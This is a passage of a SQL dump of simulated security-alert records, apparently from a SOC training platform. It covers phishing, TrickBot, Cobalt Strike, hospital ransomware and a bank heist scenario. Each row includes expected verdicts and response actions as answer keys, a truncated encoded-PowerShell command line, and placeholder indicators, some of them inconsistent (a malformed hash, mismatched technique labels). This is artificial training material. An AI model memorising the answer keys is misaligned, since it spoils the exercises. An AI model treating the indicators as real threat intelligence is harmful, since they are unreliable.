4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:00Z\\\",\\\"source_ip\\\":\\\"185.92.220.50\\\",\\\"destination_ip\\\":\\\"192.168.1.105\\\",\\\"malicious_filename\\\":\\\"election_strategy_2023.pdf\\\",\\\"hash_sha256\\\":\\\"8a7f5e3c1d4f8e1b6c3d8f7a3e2d4c5b6a1f7e8d5c2b3a4d8e3f7c1b6d2a7f9e\\\",\\\"username\\\":\\\"jdoe\\\",\\\"action\\\":\\\"file_download\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"description\\\":\\\"Leaked document detailing plans for disinformation campaign.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(289, 'Phishing Email Detected', 'medium', 'Email Gateway', 'A phishing email was detected targeting hospital staff. The email contains a malicious link designed to download TrickBot malware upon clicking.', 'Phishing', 'T1566.001', 1, 'Closed', NULL, '{\"timestamp\":\"2023-10-05T14:23:11Z\",\"email_subject\":\"Important Update Required\",\"sender_email\":\"attacker@example.com\",\"recipient_email\":\"staff@hospital.org\",\"malicious_link\":\"http://malicious-link.com/download\",\"attachment\":\"none\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.10\",\"malware_hash\":\"e99a18c428cb38d5f260853678922e03\",\"filename\":\"update-instructions.html\"}', '2025-12-31 15:22:50', '2026-02-27 02:24:38', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"attacker@example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"Known phishing email address associated with multiple attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-link.com/download\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"URL associated with TrickBot malware distribution.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"suspicious\",\"details\":\"IP address flagged for suspicious activity in recent phishing campaigns.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to TrickBot malware variant.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"update-instructions.html\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"File name commonly used in phishing emails.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Email Detected\",\"date\":\"2026-02-01T20:32:18.893Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(290, 'TrickBot Malware Execution', 'high', 'EDR', 'TrickBot malware was executed on an employee\'s workstation, allowing the attacker to establish a foothold in the network. The malware is designed to harvest credentials and facilitate further attacks.', 'Malware', 'TA0002 - Execution', 1, 'Closed', 189, '{\"timestamp\":\"2023-10-10T14:32:16Z\",\"event_type\":\"malware_execution\",\"src_ip\":\"192.168.1.45\",\"dest_ip\":\"34.210.123.158\",\"user\":\"jdoe\",\"process_name\":\"trickbot.exe\",\"process_id\":\"5678\",\"file_hash\":\"3f0a2f5e4d3a9b5c7f6e9df123456789\",\"file_path\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\trickbot.exe\",\"detected_by\":\"EDR Agent\",\"malicious_score\":95}', '2025-12-31 15:22:50', '2026-02-27 02:28:30', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"34.210.123.158\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"This IP address has been associated with TrickBot C2 servers.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Systems\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised workstation.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3f0a2f5e4d3a9b5c7f6e9df123456789\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known TrickBot malware hash.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"trickbot.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareBazaar\",\"verdict\":\"malicious\",\"details\":\"Executable file associated with TrickBot malware.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Systems\",\"verdict\":\"internal\",\"details\":\"Username of the employee whose workstation was compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(291, 'Persistence Mechanism Identified', 'high', 'EDR', 'The attacker has established a persistence mechanism on the compromised system using TrickBot. This allows them to maintain access even after system reboots.', 'Persistence', 'T1547.001 - Registry Run Keys / Startup Folder', 1, 'Closed', 189, '{\"timestamp\":\"2023-10-24T14:23:52Z\",\"event_id\":\"12345\",\"hostname\":\"victim-pc\",\"user\":\"jdoe\",\"process_name\":\"trickbot.exe\",\"process_id\":\"6789\",\"file_path\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Roaming\\\\trickbot.exe\",\"registry_key\":\"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\TrickBot\",\"registry_value\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Roaming\\\\trickbot.exe\",\"internal_ip\":\"192.168.1.15\",\"external_ip\":\"203.0.113.45\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"command_line\":\"\\\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Roaming\\\\trickbot.exe\\\" --silent\"}', '2025-12-31 15:22:50', '2026-02-27 02:32:05', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal company IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"malicious_ip_database\",\"verdict\":\"malicious\",\"details\":\"Known TrickBot command and control server\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"Hash associated with TrickBot malware\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"trickbot.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_reputation_service\",\"verdict\":\"malicious\",\"details\":\"Executable linked to TrickBot malware\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_user_directory\",\"verdict\":\"clean\",\"details\":\"Valid user in the company directory\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(292, 'Cobalt Strike Beacon Detected', 'high', 'Network Traffic Analysis', 'The attacker deploys Cobalt Strike beacons to move laterally, targeting critical systems within the hospital network to spread the ransomware.', 'Lateral Movement', 'T1570: Lateral Tool Transfer', 1, 'Closed', 189, '{\"timestamp\":\"2023-10-12T14:22:53Z\",\"source_ip\":\"193.161.35.75\",\"destination_ip\":\"10.10.15.23\",\"protocol\":\"HTTP\",\"uri\":\"/stager\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"filename\":\"beacon.exe\",\"username\":\"janedoe\",\"action\":\"download\"}', '2025-12-31 15:22:50', '2026-02-27 02:37:57', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"193.161.35.75\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known Cobalt Strike command and control server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.10.15.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal hospital network endpoint\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Cobalt Strike payload\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"beacon.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"malicious\",\"details\":\"Executable used in lateral movement\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"janedoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Unexpected activity from this user account\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(293, 'Ransomware Encryption Initiated', 'critical', 'EDR', 'The ransomware has been executed across the hospital\'s network, encrypting patient data and rendering systems unusable. Immediate focus is required on data recovery and remediation.', 'Exfiltration', 'T1486: Data Encrypted for Impact', 1, 'Closed', 189, '{\"timestamp\":\"2023-10-25T14:35:21Z\",\"event_id\":\"12345\",\"source_ip\":\"198.51.100.23\",\"target_ip\":\"10.0.0.25\",\"username\":\"hospital_admin\",\"file_affected\":\"patient_records.dat\",\"file_hash\":\"a3f5d6e8b9c2d4a1e9f8b6c4d5e9a2b3\",\"action\":\"encrypt\",\"process_name\":\"ransomware.exe\",\"process_id\":\"6789\",\"severity\":\"critical\"}', '2025-12-31 15:22:50', '2026-02-27 02:46:10', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known ransomware command and control server.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Hospital network server being targeted.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"a3f5d6e8b9c2d4a1e9f8b6c4d5e9a2b3\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known ransomware strain.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"patient_records.dat\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Critical patient data file targeted for encryption.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"hospital_admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Admin account used to execute the ransomware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(294, 'Initial Access via Spear Phishing Campaign', 'high', 'Email Gateway', 'An email containing a malicious attachment was sent to key personnel within the bank, appearing as an urgent internal communication. The attachment, if opened, installs malware to gain access to the internal network.', 'Phishing', 'T1566.001 - Phishing: Spear Phishing Attachment', 1, 'Closed', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"email_subject\":\"Urgent: Updated Security Protocols\",\"sender_email\":\"it-security@bank.com\",\"recipient_email\":\"j.doe@bank.com\",\"attachment_name\":\"SecurityUpdate.docx\",\"attachment_hash\":\"e99a18c428cb38d5f260853678922e03\",\"source_ip\":\"203.0.113.45\",\"recipient_ip\":\"10.0.1.15\",\"smtp_id\":\"<20231005142345.1.1234567890@bank.com>\"}', '2025-12-31 15:23:56', '2026-02-27 02:49:49', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"it-security@bank.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"suspicious\",\"details\":\"Email domain recently used in phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known malware hash associated with trojans.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP address associated with previous phishing attacks.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Initial Access via Spear Phishing Campaign\",\"date\":\"2026-02-01T20:32:18.897Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(295, 'Malware Execution and Credential Harvesting', 'high', 'EDR', 'The malware was executed on a compromised system, allowing attackers to harvest credentials of bank clerks and administrators. This activity was detected following a successful phishing attempt, which is pivotal for attackers to gain further access to critical financial systems.', 'Malware', 'T1059 - Command and Scripting Interpreter', 1, 'Closed', 189, '{\"timestamp\":\"2023-10-15T14:22:58Z\",\"event_type\":\"execution\",\"hostname\":\"finance-dept-pc1\",\"internal_ip\":\"192.168.10.45\",\"external_ip\":\"203.0.113.15\",\"malware_hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"filename\":\"credential_harvester.exe\",\"executing_user\":\"jdoe\",\"command_line\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Roaming\\\\credential_harvester.exe\",\"detected_by\":\"EDR\",\"status\":\"malicious\",\"os\":\"Windows 10\",\"process_id\":4567}', '2025-12-31 15:23:56', '2026-02-27 02:51:25', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.10.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP address associated with previous attacks.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"MD5 hash matches a known malware sample.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"credential_harvester.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Logs\",\"verdict\":\"malicious\",\"details\":\"Suspicious executable used for credential harvesting.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"User account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(296, 'Lateral Movement through Network Exploitation', 'high', 'Network Monitoring', 'Using the harvested credentials and specialized administrative tools, the attackers move laterally across the network. They target systems responsible for managing ATM withdrawal limits and SWIFT transactions, setting the stage for unauthorized financial operations.', 'Lateral Movement', 'T1021', 1, 'Closed', 189, '{\"timestamp\":\"2023-10-05T14:23:07Z\",\"src_ip\":\"192.168.1.105\",\"dst_ip\":\"10.0.2.15\",\"attacker_ip\":\"203.0.113.45\",\"username\":\"jdoe_admin\",\"used_tool\":\"PsExec\",\"target_system\":\"ATM-Controller-02\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"event\":\"Lateral movement detected from 192.168.1.105 to 10.0.2.15 using PsExec by user jdoe_admin.\"}', '2025-12-31 15:23:56', '2026-02-27 02:54:51', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.2.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of targeted system.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP address associated with previous attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe_admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Compromised administrative account used for lateral movement.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malicious administrative tools.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(297, 'Manipulation of ATM Withdrawal Limits and SWIFT Gateway', 'high', 'Transaction Monitoring System', 'Attackers have manipulated ATM withdrawal limits and initiated unauthorized SWIFT transactions, leading to substantial financial losses. This step marks the culmination of their heist.', 'Manipulation', 'T1566.001 - Spearphishing Attachment', 1, 'Closed', 189, '{\"timestamp\":\"2023-10-12T14:35:00Z\",\"event_id\":\"ATM-TRANS-0004\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.25\",\"username\":\"jdoe_admin\",\"action\":\"ATM Withdrawal Limit Manipulation\",\"transaction_id\":\"SWIFT-TRANS-8976\",\"file_hash\":\"4e5b6c7d8f9a0b1c2d3e4f5g6h7i8j9k\",\"affected_account\":\"1234567890\",\"amount\":\"50000\",\"currency\":\"USD\"}', '2025-12-31 15:23:56', '2026-02-27 02:57:42', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AlienVault OTX\",\"verdict\":\"malicious\",\"details\":\"Known IP for financial fraud operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal bank system IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe_admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"suspicious\",\"details\":\"Admin account used during unauthorized transaction manipulations.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"4e5b6c7d8f9a0b1c2d3e4f5g6h7i8j9k\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malware used for financial fraud.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.900Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:35:00Z\\\",\\\"event_id\\\":\\\"ATM-TRANS-0004\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"jdoe_admin\\\",\\\"action\\\":\\\"ATM Withdrawal Limit Manipulation\\\",\\\"transaction_id\\\":\\\"SWIFT-TRANS-8976\\\",\\\"file_hash\\\":\\\"4e5b6c7d8f9a0b1c2d3e4f5g6h7i8j9k\\\",\\\"affected_account\\\":\\\"1234567890\\\",\\\"amount\\\":\\\"50000\\\",\\\"currency\\\":\\\"USD\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.900Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:35:00Z\\\",\\\"event_id\\\":\\\"ATM-TRANS-0004\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"jdoe_admin\\\",\\\"action\\\":\\\"ATM Withdrawal Limit Manipulation\\\",\\\"transaction_id\\\":\\\"SWIFT-TRANS-8976\\\",\\\"file_hash\\\":\\\"4e5b6c7d8f9a0b1c2d3e4f5g6h7i8j9k\\\",\\\"affected_account\\\":\\\"1234567890\\\",\\\"amount\\\":\\\"50000\\\",\\\"currency\\\":\\\"USD\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.900Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 